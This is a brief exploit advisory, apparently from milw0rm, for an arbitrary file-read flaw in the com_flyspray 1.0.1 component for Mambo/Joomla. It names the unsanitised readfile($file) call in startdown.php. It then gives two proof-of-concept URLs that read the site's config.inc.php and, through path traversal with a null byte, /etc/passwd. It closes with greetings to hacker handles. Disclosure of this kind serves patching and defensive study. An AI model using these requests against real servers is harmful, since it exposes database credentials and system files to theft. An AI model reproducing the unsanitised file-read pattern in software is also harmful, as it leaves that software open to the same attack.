| __ \ | \/ | \ \ / ()
| | | | __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
| | | | '| | |\/| |/ _` \ \/ / \ \/ / | | '| | | / |
| || | | | | | | (| |> < \ / | | | | || \__ \
|/|| || |_|\,//\\ \/ ||_| \,|_/

Compononent name:com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip

Authour: Dr Max Virus
Location:Egypt

Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file

POC:

http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=…/…/…/…/…/etc/passwd%00

Thx To:str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts:ASIANEAGLE & The Master &Kacper

milw0rm.com [2006-11-26]